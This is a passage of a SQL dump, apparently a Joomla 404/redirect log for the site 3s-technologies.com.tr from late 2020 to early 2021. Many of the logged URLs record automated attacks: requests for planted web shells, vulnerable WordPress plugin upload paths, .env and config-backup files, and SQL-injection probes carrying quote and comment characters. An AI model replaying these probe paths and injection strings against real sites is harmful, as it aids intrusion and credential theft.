00:00:00',301),(26243,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/showbiz/temp/update_extract/raiz0__wsjul.php',NULL,'','',1,0,'2020-12-25 19:41:00','0000-00-00 00:00:00',301),(26244,'http://www.3s-technologies.com.tr/tr/components/raiz0worm_1608923333.php',NULL,'','',1,0,'2020-12-25 19:41:08','0000-00-00 00:00:00',301),(26245,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/assignments/raiz0_1608923333.php.',NULL,'','',1,0,'2020-12-25 19:41:10','0000-00-00 00:00:00',301),(26246,'http://www.3s-technologies.com.tr//wp-content/plugins/cherry-plugin/admin/import-export/upload.php',NULL,'','',2,0,'2020-12-25 19:41:11','0000-00-00 00:00:00',301),(26247,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/cherry-plugin/admin/import-export/raiz0__wsjul.php',NULL,'','',1,0,'2020-12-25 19:41:12','0000-00-00 00:00:00',301),(26248,'http://www.3s-technologies.com.tr//wp-content/plugins/reflex-gallery/admin/scripts/fileuploader/php.php?year=2018&month=01',NULL,'','',1,0,'2020-12-25 19:41:15','0000-00-00 00:00:00',301),(26249,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/2018/01/raiz0__wsjul.php',NULL,'','',1,0,'2020-12-25 19:41:16','0000-00-00 00:00:00',301),(26250,'http://www.3s-technologies.com.tr//wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'','',1,0,'2020-12-25 19:41:17','0000-00-00 00:00:00',301),(26251,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/wysija/themes/master/un.php',NULL,'','',1,0,'2020-12-25 19:41:18','0000-00-00 00:00:00',301),(26252,'http://www.3s-technologies.com.tr/tr/root.php',NULL,'','',5,0,'2020-12-25 19:41:21','0000-00-00 00:00:00',301),(26253,'http://3s-technologies.com.tr/tr/emergency.php',NULL,'','',3,0,'2020-12-25 23:23:03','0000-00-00 00:00:00',301),(26254,'http://3s-technologies.com.tr/accesson2.php',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2020-12-26 15:44:49','0000-00-00 00:00:00',301),(26255,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/?itemid=429',NULL,'','',4,0,'2020-12-27 06:53:35','0000-00-00 00:00:00',301),(26256,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/?itemid=243',NULL,'','',3,0,'2020-12-27 06:56:26','0000-00-00 00:00:00',301),(26257,'http://3s-technologies.com.tr/tr/joomla/images/pdf/le_benchtop_automated_pick-place.pdf',NULL,'','',3,0,'2020-12-27 16:35:43','0000-00-00 00:00:00',301),(26258,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/easy-wp-smtp',NULL,'','',1,0,'2020-12-27 22:08:44','0000-00-00 00:00:00',301),(26259,'http://3s-technologies.com.tr/en/emergency.php',NULL,'www.google.com','',2,0,'2020-12-27 22:54:04','0000-00-00 00:00:00',301),(26260,'http://3s-technologies.com.tr/en/wp-content/themes/wp-update.php',NULL,'www.google.com','',1,0,'2020-12-27 22:54:14','0000-00-00 00:00:00',301),(26261,'http://www.3s-technologies.com.tr/tr/apple-touch-icon-76x76-precomposed.png',NULL,'','',1,0,'2021-01-01 00:41:26','0000-00-00 00:00:00',301),(26262,'http://www.3s-technologies.com.tr/tr/apple-touch-icon-76x76.png',NULL,'','',1,0,'2021-01-01 00:41:28','0000-00-00 00:00:00',301),(26263,'https://www.3s-technologies.com.tr/en/apple-touch-icon-152x152-precomposed.png',NULL,'','',7,0,'2021-01-01 11:10:31','0000-00-00 00:00:00',301),(26264,'https://www.3s-technologies.com.tr/en/apple-touch-icon-152x152.png',NULL,'','',7,0,'2021-01-01 11:10:32','0000-00-00 00:00:00',301),(26265,'https://www.3s-technologies.com.tr/en/apple-touch-icon-precomposed.png',NULL,'','',11,0,'2021-01-01 11:10:32','0000-00-00 00:00:00',301),(26266,'https://www.3s-technologies.com.tr/en/apple-touch-icon.png',NULL,'','',11,0,'2021-01-01 11:10:33','0000-00-00 00:00:00',301),(26267,'http://3s-technologies.com.tr/tr/?r?nler/lazer-markalama',NULL,'','',3,0,'2021-01-03 11:58:02','0000-00-00 00:00:00',301),(26268,'http://3s-technologies.com.tr/tr/?r?nler/cnc',NULL,'','',3,0,'2021-01-03 11:58:02','0000-00-00 00:00:00',301),(26269,'http://3s-technologies.com.tr/tr/?r?nler',NULL,'','',3,0,'2021-01-03 11:58:02','0000-00-00 00:00:00',301),(26270,'http://3s-technologies.com.tr/tr/nav',NULL,'','',2,0,'2021-01-03 11:58:02','0000-00-00 00:00:00',301),(26271,'http://3s-technologies.com.tr/tr/3s-technologies.com.tr/tr',NULL,'','',1,0,'2021-01-03 11:58:02','0000-00-00 00:00:00',301),(26272,'http://3s-technologies.com.tr/tr/3s-technologies.com.tr/tr/component/search?itemid=594&format=opensearch',NULL,'','',1,0,'2021-01-03 11:58:04','0000-00-00 00:00:00',301),(26273,'https://www.3s-technologies.com.tr/tr/?option=com_user&task=register',NULL,'','',1,0,'2021-01-03 19:03:36','0000-00-00 00:00:00',301),(26274,'https://www.3s-technologies.com.tr/tr/joomla/other-components/registration-form',NULL,'','',1,0,'2021-01-03 19:03:42','0000-00-00 00:00:00',301),(26275,'https://www.3s-technologies.com.tr/tr/?option=com_community&view=register',NULL,'','',1,0,'2021-01-03 19:04:11','0000-00-00 00:00:00',301),(26276,'https://www.3s-technologies.com.tr/tr/component/user/register.html',NULL,'','',1,0,'2021-01-03 19:04:17','0000-00-00 00:00:00',301),(26277,'https://www.3s-technologies.com.tr/tr/registration/registers',NULL,'','',1,0,'2021-01-03 19:04:18','0000-00-00 00:00:00',301),(26278,'https://www.3s-technologies.com.tr/tr/registratsiya/registers',NULL,'','',1,0,'2021-01-03 19:04:19','0000-00-00 00:00:00',301),(26279,'https://www.3s-technologies.com.tr/tr/component/comprofiler/registers.html',NULL,'','',1,0,'2021-01-03 19:04:19','0000-00-00 00:00:00',301),(26280,'https://www.3s-technologies.com.tr/tr/user/registration',NULL,'','',1,0,'2021-01-03 19:04:20','0000-00-00 00:00:00',301),(26281,'https://www.3s-technologies.com.tr/tr/?option=com_secureregistration&task=register',NULL,'','',1,0,'2021-01-03 19:04:21','0000-00-00 00:00:00',301),(26282,'https://www.3s-technologies.com.tr/tr/component/option,com_comprofiler/task,registers',NULL,'','',1,0,'2021-01-03 19:04:23','0000-00-00 00:00:00',301),(26283,'https://www.3s-technologies.com.tr/tr/?option=com_registration&task=register',NULL,'','',1,0,'2021-01-03 19:04:24','0000-00-00 00:00:00',301),(26284,'https://www.3s-technologies.com.tr/tr/?option=com_comprofiler&task=registers',NULL,'','',2,0,'2021-01-03 19:04:25','0000-00-00 00:00:00',301),(26285,'https://www.3s-technologies.com.tr/tr/?option=com_joocm&view=register',NULL,'','',1,0,'2021-01-03 19:04:27','0000-00-00 00:00:00',301),(26286,'https://www.3s-technologies.com.tr/tr/?option=com_easysocial&view=registration',NULL,'','',2,0,'2021-01-03 19:04:28','0000-00-00 00:00:00',301),(26287,'https://www.3s-technologies.com.tr/tr/registration',NULL,'','',1,0,'2021-01-03 19:04:31','0000-00-00 00:00:00',301),(26288,'http://www.3s-technologies.com.tr/en/components/com_virtuemart/assets/css/chosen-sprite@2x.png',NULL,'http://www.3s-technologies.com.tr/tr/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2','',1,0,'2021-01-04 19:24:09','0000-00-00 00:00:00',301),(26289,'http://3s-technologies.com.tr/tr/wp-includes/css/css.php',NULL,'','',14,0,'2021-01-06 15:35:34','0000-00-00 00:00:00',301),(26290,'http://3s-technologies.com.tr/tr/wp-includes/fonts/css.php',NULL,'','',4,0,'2021-01-06 15:36:35','0000-00-00 00:00:00',301),(26291,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/npm-d3a-detail',NULL,'','',1,0,'2021-01-10 12:12:15','0000-00-00 00:00:00',301),(26292,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/npm-w2s-detail',NULL,'','',2,0,'2021-01-10 12:12:15','0000-00-00 00:00:00',301),(26293,'https://3s-technologies.com.tr/en/?format=feed-1\"/*&type=rss',NULL,'','',1,0,'2021-01-12 19:30:55','0000-00-00 00:00:00',301),(26294,'https://3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch-1\"/*',NULL,'','',1,0,'2021-01-12 19:31:06','0000-00-00 00:00:00',301),(26295,'https://3s-technologies.com.tr/en/',NULL,'','',1158,0,'2021-01-12 19:31:16','0000-00-00 00:00:00',301),(26296,'https://3s-technologies.com.tr/en/videos?format=feed-1\"/*&type=rss',NULL,'','',1,0,'2021-01-12 19:32:18','0000-00-00 00:00:00',301),(26297,'https://3s-technologies.com.tr/en/contacts',NULL,'','',7,0,'2021-01-12 19:33:11','0000-00-00 00:00:00',301),(26298,'https://3s-technologies.com.tr/tr/?format=feed-1\"/*&type=rss',NULL,'','',1,0,'2021-01-12 19:34:29','0000-00-00 00:00:00',301),(26299,'https://3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch-1\"/*',NULL,'','',1,0,'2021-01-12 19:34:58','0000-00-00 00:00:00',301),(26300,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:16','0000-00-00 00:00:00',301),(26301,'https://3s-technologies.com.tr/en/products-en?keyword=keyword\'&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:16','0000-00-00 00:00:00',301),(26302,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory\'&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:17','0000-00-00 00:00:00',301),(26303,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart\'&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:18','0000-00-00 00:00:00',301),(26304,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18\'&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:19','0000-00-00 00:00:00',301),(26305,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588\'',NULL,'','',2,0,'2021-01-12 19:35:19','0000-00-00 00:00:00',301),(26306,'https://3s-technologies.com.tr/en/products-en?keyword=keyword\"&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:20','0000-00-00 00:00:00',301),(26307,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory\"&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:21','0000-00-00 00:00:00',301),(26308,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart\"&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:21','0000-00-00 00:00:00',301),(26309,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18\"&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:22','0000-00-00 00:00:00',301),(26310,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588\"',NULL,'','',1,0,'2021-01-12 19:35:23','0000-00-00 00:00:00',301),(26311,'https://3s-technologies.com.tr/en/products-en?keyword=keyword\\&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:23','0000-00-00 00:00:00',301),(26312,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory\\&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:24','0000-00-00 00:00:00',301),(26313,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart\\&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:25','0000-00-00 00:00:00',301),(26314,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18\\&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:26','0000-00-00 00:00:00',301),(26315,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588\\',NULL,'','',1,0,'2021-01-12 19:35:26','0000-00-00 00:00:00',301),(26316,'https://3s-technologies.com.tr/en/products-en?keyword=keyword\'--&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:27','0000-00-00 00:00:00',301),(26317,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory\'--&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:28','0000-00-00 00:00:00',301),(26318,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart\'--&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:28','0000-00-00 00:00:00',301),(26319,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18\'--&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:29','0000-00-00 00:00:00',301),(26320,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588\'--',NULL,'','',1,0,'2021-01-12 19:35:30','0000-00-00 00:00:00',301),(26321,'https://3s-technologies.com.tr/en/products-en?keyword=keyword\'/*&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:31','0000-00-00 00:00:00',301),(26322,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory\'/*&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:31','0000-00-00 00:00:00',301),(26323,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart\'/*&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:32','0000-00-00 00:00:00',301),(26324,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18\'/*&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:35:33','0000-00-00 00:00:00',301),(26325,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588\'/*',NULL,'','',1,0,'2021-01-12 19:35:33','0000-00-00 00:00:00',301),(26326,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart\'',NULL,'','',1,0,'2021-01-12 19:35:36','0000-00-00 00:00:00',301),(26327,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18\'',NULL,'','',1,0,'2021-01-12 19:35:36','0000-00-00 00:00:00',301),(26328,'https://3s-technologies.com.tr/en/products-en?keyword=keyword-1\"/*&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:36:11','0000-00-00 00:00:00',301),(26329,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory-1\"/*&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:36:11','0000-00-00 00:00:00',301),(26330,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart-1\"/*&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:36:12','0000-00-00 00:00:00',301),(26331,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18-1\"/*&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:36:13','0000-00-00 00:00:00',301),(26332,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588-1\"/*',NULL,'','',1,0,'2021-01-12 19:36:13','0000-00-00 00:00:00',301),(26333,'https://3s-technologies.com.tr/en/products-en?keyword=keyword?\'&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:36:23','0000-00-00 00:00:00',301),(26334,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory?\'&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:36:23','0000-00-00 00:00:00',301),(26335,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart?\'&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:36:24','0000-00-00 00:00:00',301),(26336,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18?\'&itemid=itemid588',NULL,'','',1,0,'2021-01-12 19:36:25','0000-00-00 00:00:00',301),(26337,'https://3s-technologies.com.tr/en/products-en?keyword=keyword&view=viewcategory&option=optioncom_virtuemart&virtuemart_category_id=virtuemart_category_id18&itemid=itemid588?\'',NULL,'','',1,0,'2021-01-12 19:36:25','0000-00-00 00:00:00',301),(26338,'https://3s-technologies.com.tr/en/component/search/?itemid=588&virtuemart_category_id=18&limit=20&format=opensearch-1\"/*',NULL,'','',1,0,'2021-01-12 19:37:14','0000-00-00 00:00:00',301),(26339,'https://3s-technologies.com.tr/en/products-en',NULL,'','',7,0,'2021-01-12 19:40:04','0000-00-00 00:00:00',301),(26340,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_virtuemart/assets/css/chosen-sprite@2x.png',NULL,'http://proneo-led.com/3s-technologies.com.tr/joomla/components/com_virtuemart/assets/css/chosen.css?vmver=6ee028ee','',7,0,'2021-01-14 11:49:46','0000-00-00 00:00:00',301),(26341,'http://www.3s-technologies.com.tr/tr/wp-includes/fonts/css.php',NULL,'','',1,0,'2021-01-15 05:42:46','0000-00-00 00:00:00',301),(26342,'http://3s-technologies.com.tr/tr/ash-2013---new-orleans.html',NULL,'http://3s-technologies.com.tr/ash-2013---new-orleans.html','',1,0,'2021-01-15 09:42:08','0000-00-00 00:00:00',301),(26343,'http://3s-technologies.com.tr/tr/can-genetic-sequencing-help-to-cure-leukemia.html',NULL,'http://3s-technologies.com.tr/can-genetic-sequencing-help-to-cure-leukemia.html','',1,0,'2021-01-15 09:42:34','0000-00-00 00:00:00',301),(26344,'http://3s-technologies.com.tr/tr/can-the-new-drug-cx-5461-cure-leukemia.html',NULL,'http://3s-technologies.com.tr/can-the-new-drug-cx-5461-cure-leukemia.html','',1,0,'2021-01-15 09:42:53','0000-00-00 00:00:00',301),(26345,'http://3s-technologies.com.tr/tr/wp-content',NULL,'','',332,0,'2021-01-16 14:44:27','0000-00-00 00:00:00',301),(26346,'http://3s-technologies.com.tr/en/github.com/joomla',NULL,'','',15,0,'2021-01-17 20:24:49','0000-00-00 00:00:00',301),(26347,'http://www.3s-technologies.com.tr/config.bak.php',NULL,'','',1,0,'2021-01-17 21:42:29','0000-00-00 00:00:00',301),(26348,'https://www.3s-technologies.com.tr/config.bak.php',NULL,'','',1,0,'2021-01-17 21:42:39','0000-00-00 00:00:00',301),(26349,'https://3s-technologies.com.tr/tr/sitemap.txt',NULL,'','',181,0,'2021-01-18 17:46:21','0000-00-00 00:00:00',301),(26350,'http://www.3s-technologies.com.tr/wp-admin/config.bak.php',NULL,'','',2,0,'2021-01-20 09:58:51','0000-00-00 00:00:00',301),(26351,'http://www.3s-technologies.com.tr/wp-content/config.bak.php',NULL,'','',1,0,'2021-01-20 09:59:04','0000-00-00 00:00:00',301),(26352,'http://www.3s-technologies.com.tr/wp-includes/config.bak.php',NULL,'','',1,0,'2021-01-20 09:59:13','0000-00-00 00:00:00',301),(26353,'http://3s-technologies.com.tr/tr/sitemap.txt',NULL,'','',172,0,'2021-01-21 03:15:53','0000-00-00 00:00:00',301),(26354,'https://www.3s-technologies.com.tr/wp-admin/config.bak.php',NULL,'','',1,0,'2021-01-21 07:01:12','0000-00-00 00:00:00',301),(26355,'http://3s-technologies.com.tr/.env',NULL,'','',17,0,'2021-01-21 16:19:56','0000-00-00 00:00:00',301),(26356,'http://3s-technologies.com.tr/local/.env',NULL,'','',5,0,'2021-01-21 16:20:03','0000-00-00 00:00:00',301),(26357,'http://3s-technologies.com.tr/dev/.env',NULL,'','',1,0,'2021-01-21 16:20:06','0000-00-00 00:00:00',301),(26358,'http://3s-technologies.com.tr/api/.env',NULL,'','',5,0,'2021-01-21 16:20:08','0000-00-00 00:00:00',301),(26359,'http://3s-technologies.com.tr/stag/.env',NULL,'','',1,0,'2021-01-21 16:20:11','0000-00-00 00:00:00',301),(26360,'http://3s-technologies.com.tr/platform/.env',NULL,'','',1,0,'2021-01-21 16:20:13','0000-00-00 00:00:00',301),(26361,'http://3s-technologies.com.tr/staging/.env',NULL,'','',1,0,'2021-01-21 16:20:15','0000-00-00 00:00:00',301),(26362,'http://3s-technologies.com.tr/development/.env',NULL,'','',4,0,'2021-01-21 16:20:16','0000-00-00 00:00:00',301),(26363,'http://3s-technologies.com.tr/localhost/.env',NULL,'','',1,0,'2021-01-21 16:20:19','0000-00-00 00:00:00',301),(26364,'http://3s-technologies.com.tr/test/.env',NULL,'','',1,0,'2021-01-21 16:20:21','0000-00-00 00:00:00',301),(26365,'http://3s-technologies.com.tr/testing/.env',NULL,'','',1,0,'2021-01-21 16:20:23','0000-00-00 00:00:00',301),(26366,'http://3s-technologies.com.tr/production/.env',NULL,'','',1,0,'2021-01-21 16:20:25','0000-00-00 00:00:00',301),(26367,'http://3s-technologies.com.tr/locally/.env',NULL,'','',1,0,'2021-01-21 16:20:27','0000-00-00 00:00:00',301),(26368,'http://3s-technologies.com.tr/developer/.env',NULL,'','',1,0,'2021-01-21 16:20:28','0000-00-00 00:00:00',301),(26369,'http://3s-technologies.com.tr/public/.env',NULL,'','',2,0,'2021-01-21 16:20:31','0000-00-00 00:00:00',301),(26370,'http://3s-technologies.com.tr/app/.env',NULL,'','',5,0,'2021-01-21 16:20:33','0000-00-00 00:00:00',301),(26371,'http://3s-technologies.com.tr/core/.env',NULL,'','',5,0,'2021-01-21 16:20:35','0000-00-00 00:00:00',301),(26372,'http://3s-technologies.com.tr/data/.env',NULL,'','',1,0,'2021-01-21 16:20:38','0000-00-00 00:00:00',301),(26373,'http://3s-technologies.com.tr/api1/.env',NULL,'','',1,0,'2021-01-21 16:20:40','0000-00-00 00:00:00',301),(26374,'http://3s-technologies.com.tr/v1/.env',NULL,'','',2,0,'2021-01-21 16:20:42','0000-00-00 00:00:00',301),(26375,'http://3s-technologies.com.tr/v2/.env',NULL,'','',2,0,'2021-01-21 16:20:44','0000-00-00 00:00:00',301),(26376,'http://3s-technologies.com.tr/apiv1/.env',NULL,'','',1,0,'2021-01-21 16:20:46','0000-00-00 00:00:00',301),(26377,'http://3s-technologies.com.tr/apiv2/.env',NULL,'','',1,0,'2021-01-21 16:20:48','0000-00-00 00:00:00',301),(26378,'http://3s-technologies.com.tr/apps/.env',NULL,'','',5,0,'2021-01-21 16:20:49','0000-00-00 00:00:00',301),(26379,'http://3s-technologies.com.tr/git/.env',NULL,'','',1,0,'2021-01-21 16:20:51','0000-00-00 00:00:00',301),(26380,'http://3s-technologies.com.tr/laravel/.env',NULL,'','',4,0,'2021-01-21 16:20:54','0000-00-00 00:00:00',301),(26381,'http://3s-technologies.com.tr/sites/.env',NULL,'','',2,0,'2021-01-21 16:20:56','0000-00-00 00:00:00',301),(26382,'http://3s-technologies.com.tr/web/.env',NULL,'','',1,0,'2021-01-21 16:20:58','0000-00-00 00:00:00',301),(26383,'http://3s-technologies.com.tr/site/.env',NULL,'','',2,0,'2021-01-21 16:21:03','0000-00-00 00:00:00',301),(26384,'http://3s-technologies.com.tr/member/.env',NULL,'','',1,0,'2021-01-21 16:21:05','0000-00-00 00:00:00',301),(26385,'http://3s-technologies.com.tr/wp-admin/config.bak.php',NULL,'','',1,0,'2021-01-23 11:22:11','0000-00-00 00:00:00',301),(26386,'http://3s-technologies.com.tr/wp-content/config.bak.php',NULL,'','',1,0,'2021-01-23 11:22:21','0000-00-00 00:00:00',301),(26387,'https://www.3s-technologies.com.tr/tr/sitemap.txt',NULL,'','',31,0,'2021-01-23 13:06:57','0000-00-00 00:00:00',301),(26388,'http://www.3s-technologies.com.tr/en/wood-processing-ahåÿap-iåÿleme',NULL,'','',4,0,'2021-01-23 16:25:48','0000-00-00 00:00:00',301),(26389,'http://3s-technologies.com.tr/tr/baby-gifts-!54-cat.html',NULL,'http://3s-technologies.com.tr/Baby-Gifts-!54-cat.html','',1,0,'2021-01-24 22:49:38','0000-00-00 00:00:00',301),(26390,'http://3s-technologies.com.tr/tr/hotel-and-travel-!6-cat.html',NULL,'http://3s-technologies.com.tr/Hotel-and-Travel-!6-cat.html','',1,0,'2021-01-24 22:49:41','0000-00-00 00:00:00',301),(26391,'http://3s-technologies.com.tr/tr/shopping-vouchers-!12-cat.html',NULL,'http://3s-technologies.com.tr/Shopping-Vouchers-!12-cat.html','',1,0,'2021-01-24 22:49:46','0000-00-00 00:00:00',301),(26392,'http://3s-technologies.com.tr//wp-zero.php',NULL,'','',1,0,'2021-01-25 01:14:01','0000-00-00 00:00:00',301),(26393,'http://3s-technologies.com.tr/tr/_ignition/execute-solution',NULL,'http://3s-technologies.com.tr/_ignition/execute-solution','',2,0,'2021-01-25 02:24:05','0000-00-00 00:00:00',301),(26394,'http://www.3s-technologies.com.tr/tr/sitemap.txt',NULL,'','',136,0,'2021-01-25 07:59:07','0000-00-00 00:00:00',301),(26395,'http://www.3s-technologies.com.tr/tr/demo/js/common.js',NULL,'','',2,0,'2021-01-25 10:42:51','0000-00-00 00:00:00',301),(26396,'https://www.3s-technologies.com.tr/en/wp-login.php',NULL,'','',13,0,'2021-01-28 14:16:52','0000-00-00 00:00:00',301),(26397,'http://3s-technologies.com.tr/en/community',NULL,'','',6,0,'2021-01-29 08:25:22','0000-00-00 00:00:00',301),(26398,'http://3s-technologies.com.tr/tr/configuration.php',NULL,'','',2,0,'2021-01-29 17:00:23','0000-00-00 00:00:00',301),(26399,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/slideshow/00-center-comp-1-640x377.png',NULL,'','',27,0,'2021-01-29 20:55:46','0000-00-00 00:00:00',301),(26400,'http://3s-technologies.com.tr/wp-content/db-cache.php',NULL,'','',4,0,'2021-01-29 21:30:57','0000-00-00 00:00:00',301),(26401,'https://3s-technologies.com.tr/wp-content/db-cache.php',NULL,'','',4,0,'2021-01-29 21:31:15','0000-00-00 00:00:00',301),(26402,'http://3s-technologies.com.tr/tr/images/funk.txt',NULL,'','',1,0,'2021-01-30 08:34:15','0000-00-00 00:00:00',301),(26403,'http://3s-technologies.com.tr/tr/images/fuck.txt',NULL,'','',1,0,'2021-01-30 15:18:24','0000-00-00 00:00:00',301),(26404,'http://3s-technologies.com.tr/tr//contact/',NULL,'','',1,0,'2021-01-30 18:48:53','0000-00-00 00:00:00',301),(26405,'http://3s-technologies.com.tr/tr/images/bayraktar.gif',NULL,'','',1,0,'2021-01-31 21:19:04','0000-00-00 00:00:00',301),(26406,'http://3s-technologies.com.tr/tr/images/bilgekultigin.png',NULL,'','',1,0,'2021-02-01 08:33:37','0000-00-00 00:00:00',301),(26407,'http://3s-technologies.com.tr/tr/images/sht.txt',NULL,'','',1,0,'2021-02-01 14:53:57','0000-00-00 00:00:00',301),(26408,'http://3s-technologies.com.tr/tr/images/yo.txt',NULL,'','',1,0,'2021-02-01 17:55:39','0000-00-00 00:00:00',301),(26409,'http://3s-technologies.com.tr/tr/images/secure.gif',NULL,'','',1,0,'2021-02-03 16:16:50','0000-00-00 00:00:00',301),(26410,'http://3s-technologies.com.tr/tr/wp-content/wp-1ogin_bak.php',NULL,'','',2,0,'2021-02-03 19:00:34','0000-00-00 00:00:00',301),(26411,'https://3s-technologies.com.tr/tr/wp-login.php',NULL,'','',107,0,'2021-02-05 02:04:27','0000-00-00 00:00:00',301),(26412,'http://3s-technologies.com.tr/en/wp-includes/wpconfig.bak.php?act=ul',NULL,'www.google.com','',1,0,'2021-02-06 09:33:30','0000-00-00 